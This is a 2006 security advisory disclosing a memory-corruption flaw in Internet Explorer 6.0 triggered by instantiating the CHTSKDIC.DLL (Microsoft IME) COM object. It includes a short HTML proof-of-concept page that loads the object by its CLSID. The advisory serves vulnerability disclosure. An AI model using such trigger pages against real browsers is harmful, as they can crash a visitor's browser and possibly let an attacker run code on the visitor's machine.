[XSec-06-03]: Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability
Advisory ID:
XSec-06-03
Advisory Name:
Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability
Release Date:
08/15/2006
Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows XP SP2 CN
Affected version:
Internet Explorer 6.0
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
A vulnerability has been found in Internet Explorer 6.0. \
When Internet Explorer tries to instantiate the CHTSKDIC.DLL \
(Microsoft IME) COM object as an ActiveX control, it may corrupt \
system memory in such a way that an attacker may DoS and possibly \
could execute arbitrary code.
Exploit:
=============== CHTSKDIC.DLL.htm start ================
<!--
// Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability
// tested XP SP2 CN
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {BE4191FB-59EF-4825-AEFC-109727951E42}
// Info: ImeSingleKanjiDict// ProgID: ID2
// InprocServer32: C:\WINDOWS\IME\CHTIME\APPLETS\CHTSKDIC.DLL
!-->
<html><body>
<object classid="CLSID:{BE4191FB-59EF-4825-AEFC-109727951E42}" ></object>
</body></html>
=============== CHTSKDIC.DLL.htm end ==================
Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=9
About XSec:
We are redhat.